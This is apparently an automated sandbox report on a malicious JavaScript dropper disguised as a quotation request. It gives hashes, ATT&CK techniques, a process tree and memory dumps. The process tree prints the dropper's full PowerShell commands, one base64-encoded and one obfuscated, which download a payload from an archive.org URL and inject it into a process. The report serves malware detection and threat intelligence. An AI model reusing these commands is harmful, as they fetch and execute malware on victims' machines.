cfea01473114d986467817f9c5e0713e84ef8d6fa8a44509780d390fc6b09b41

General

Target

REQUEST FOR QUOTATION.js
Size

318KB
MD5

08dab38ef2c8bdada3b4928145b777f7
SHA1

8d9fe403c417c9fc50ed09528dd2b096ebfe6375
SHA256

cfea01473114d986467817f9c5e0713e84ef8d6fa8a44509780d390fc6b09b41
SHA512

52aeb79f20660946bb7095addb26de8f115d29c4b15cd8169418d73db102c4ca7f79096780baa896357efe40999957969631b718557fd7c35e7375a2288ea5d5
SSDEEP

6144:ae3G0HrhDz6LXUo09qGOWIC5pbyo68vh146TIVdDfo+IitZsVAsuG7EEqZ1Cr81b:Zr81VpOhEUX7dyIUwRjsSXKs0AUUbPMz

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2756	powershell.exe
6	2756	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1904	powershell.exe
2756	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1904	powershell.exe
2756	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1904	powershell.exe
Token: SeDebugPrivilege	2756	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2124 wrote to memory of 1904	2124	wscript.exe	30
PID 2124 wrote to memory of 1904	2124	wscript.exe	30
PID 2124 wrote to memory of 1904	2124	wscript.exe	30
PID 1904 wrote to memory of 2756	1904	powershell.exe	32
PID 1904 wrote to memory of 2756	1904	powershell.exe	32
PID 1904 wrote to memory of 2756	1904	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\REQUEST FOR QUOTATION.js"
1⤵
- Suspicious use of WriteProcessMemory
PID:2124
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAKABbAHMAVABSAGkATgBHAF0AJABWAEUAUgBiAE8AcwBFAHAAUgBFAGYAZQBSAEUATgBDAEUAKQBbADEALAAzAF0AKwAnAFgAJwAtAEoAbwBpAG4AJwAnACkAKAAgACgAJwBGACcAKwAnADAANAAnACsAJwB1AHIAbAAgACcAKwAnAD0AIABuAEsAcgAnACsAJwBoAHQAJwArACcAdABwACcAKwAnAHMAJwArACcAOgAvAC8AaQBhADkAMAA0ADYAMAAxAC4AdQBzAC4AYQAnACsAJwByAGMAJwArACcAaABpAHYAZQAuAG8AJwArACcAcgBnAC8ANgAvACcAKwAnAGkAdABlAG0AcwAvAGQAZQAnACsAJwB0AGEAaAAtAG4AbwB0AGUALQBqAC8ARABlACcAKwAnAHQAYQBoAE4AJwArACcAbwAnACsAJwB0AGUASgAuAHQAeAB0ACcAKwAnAG4ASwByADsARgAwADQAYgBhAHMAZQA2ACcAKwAnADQAQwBvAG4AdABlAG4AJwArACcAdAAgAD0AJwArACcAIAAoAE4AZQB3AC0ATwBiACcAKwAnAGoAZQBjAHQAIAAnACsAJwBTAHkAcwAnACsAJwB0AGUAbQAnACsAJwAuACcAKwAnAE4AZQB0AC4AJwArACcAVwBlAGIAQwBsAGkAZQBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAbwAnACsAJwB3AG4AbABvAGEAZAAnACsAJwBTAHQAcgBpAG4AJwArACcAZwAnACsAJwAoAEYAMAA0AHUAcgBsACcAKwAnACkAJwArACcAOwBGACcAKwAnADAANABiAGkAbgBhAHIAeQBDACcAKwAnAG8AbgB0AGUAbgAnACsAJwB0ACAAPQAgAFsAUwB5ACcAKwAnAHMAdABlACcAKwAnAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvACcAKwAnAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnACsAJwBGADAANABiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACkAJwArACcAOwBGADAANABhAHMAJwArACcAcwBlAG0AYgBsACcAKwAnAHkAJwArACcAIAA9ACAAWwBSAGUAZgBsACcAKwAnAGUAJwArACcAYwB0AGkAbwBuAC4AQQAnACsAJwBzAHMAZQBtAGIAJwArACcAbAB5AF0AJwArACcAOgA6ACcAKwAnAEwAbwBhAGQAKABGADAANABiAGkAbgAnACsAJwBhACcAKwAnAHIAeQAnACsAJwBDAG8AbgB0AGUAJwArACcAbgB0ACkAOwBGADAAJwArACcANAB0AHkAcABlACAAPQAgAEYAMAA0AGEAcwAnACsAJwBzAGUAbQBiAGwAeQAnACsAJwAuACcAKwAnAEcAZQB0ACcAKwAnAFQAJwArACcAeQBwAGUAKABuAEsAJwArACcAcgBSACcAKwAnAHUAbgBQAEUALgBIACcAKwAnAG8AbQBlACcAKwAnAG4AJwArACcASwByACcAKwAnACkAOwBGADAANABtACcAKwAnAGUAdABoAG8AZAAgAD0AIABGADAANAB0AHkAcABlAC4ARwBlACcAKwAnAHQATQBlAHQAaABvAGQAKABuAEsAcgAnACsAJwBWAEEASQBuAEsAcgApADsAJwArACcARgAwADQAbQBlAHQAaAAnACsAJwBvAGQALgBJAG4AdgBvAGsAZQAnACsAJwAoAEYAMAA0ACcAKwAnAG4AJwArACcAdQBsAGwALAAgACcAKwAnAFsAbwBiAGoAZQBjAHQAWwBdACcAKwAnAF0AQAAnACsAJwAoAG4ASwByAHQAeAB0ACcAKwAnAC4AYQBmAGkAJwArACcAbgBlAGoALwB2ACcAKwAnAGUAZAAnACsAJwAuACcAKwAnADIAcgAuACcAKwAnADMAOQBiADMANAA1ADMAMAAyAGEAMAA3ACcAKwAnADUAYgAxAGIAYwAwACcAKwAnAGQANAA1AGIANgAnACsAJwAzACcAKwAnADIAZQBiADkAJwArACcAZQBlADYAMgAtAGIAdQBwAC8AJwArACcALwA6ACcAKwAnAHMAcAB0AHQAJwArACcAaABuAEsAJwArACcAcgAgACwAIABuAEsAcgBkAGUAcwBhACcAKwAnAHQAaQB2AGEAZABvAG4ASwByACcAKwAnACAALAAnACsAJwAgAG4ASwByAGQAZQBzAGEAdABpAHYAYQBkAG8AbgBLACcAKwAnAHIAIAAsACcAKwAnACAAbgBLAHIAJwArACcAZAAnACsAJwBlAHMAYQB0ACcAKwAnAGkAdgAnACsAJwBhAGQAbwAnACsAJwBuAEsAcgAsAG4ASwByAEEAZABkACcAKwAnAEkAJwArACcAbgBQAHIAbwBjAGUAcwBzADMAMgBuAEsAcgAsAG4AJwArACcASwByAGQAZQBzAGEAJwArACcAdABpAHYAYQBkAG8AbgBLAHIAJwArACcAKQApADsAJwApAC4AUgBFAHAATABBAGMAZQAoACcARgAwADQAJwAsACcAJAAnACkALgBSAEUAcABMAEEAYwBlACgAJwBuAEsAcgAnACwAWwBzAHQAcgBpAE4ARwBdAFsAQwBIAEEAUgBdADMAOQApACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1904
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([sTRiNG]$VERbOsEpREfeRENCE)[1,3]+'X'-Join'')( ('F'+'04'+'url '+'= nKr'+'ht'+'tp'+'s'+'://ia904601.us.a'+'rc'+'hive.o'+'rg/6/'+'items/de'+'tah-note-j/De'+'tahN'+'o'+'teJ.txt'+'nKr;F04base6'+'4Conten'+'t ='+' (New-Ob'+'ject '+'Sys'+'tem'+'.'+'Net.'+'WebClien'+'t'+').'+'Do'+'wnload'+'Strin'+'g'+'(F04url'+')'+';F'+'04binaryC'+'onten'+'t = [Sy'+'ste'+'m.Co'+'nvert]::'+'Fro'+'mBase64String('+'F04base64Content)'+';F04as'+'sembl'+'y'+' = [Refl'+'e'+'ction.A'+'ssemb'+'ly]'+'::'+'Load(F04bin'+'a'+'ry'+'Conte'+'nt);F0'+'4type = F04as'+'sembly'+'.'+'Get'+'T'+'ype(nK'+'rR'+'unPE.H'+'ome'+'n'+'Kr'+');F04m'+'ethod = F04type.Ge'+'tMethod(nKr'+'VAInKr);'+'F04meth'+'od.Invoke'+'(F04'+'n'+'ull, '+'[object[]'+']@'+'(nKrtxt'+'.afi'+'nej/v'+'ed'+'.'+'2r.'+'39b345302a07'+'5b1bc0'+'d45b6'+'3'+'2eb9'+'ee62-bup/'+'/:'+'sptt'+'hnK'+'r , nKrdesa'+'tivadonKr'+' ,'+' nKrdesativadonK'+'r ,'+' nKr'+'d'+'esat'+'iv'+'ado'+'nKr,nKrAdd'+'I'+'nProcess32nKr,n'+'Krdesa'+'tivadonKr'+'));').REpLAce('F04','$').REpLAce('nKr',[striNG][CHAR]39))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2756

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
e0fc8c21fd178abc04932afb4444f5ab

SHA1
3b9a7f9fd616692306ebd980654408c2629456a0

SHA256
67ec64dba8003605719fbddf341c9e02742a298f7567d8650cd60da8253373fb

SHA512
1f40e244673ca4865101084fe9a80e0c11fd98c36abb64ac7c8ca4a460ebe65265a40dda79c5982f1b80c71311e4454444388eb14a0d9acbb2fe787f2de454b0

Download Submit
memory/1904-4-0x000007FEF5AFE000-0x000007FEF5AFF000-memory.dmp

Filesize
4KB

Download
memory/1904-5-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/1904-8-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/1904-7-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/1904-6-0x0000000001F00000-0x0000000001F08000-memory.dmp

Filesize
32KB

Download
memory/1904-9-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/1904-10-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/1904-11-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/1904-17-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing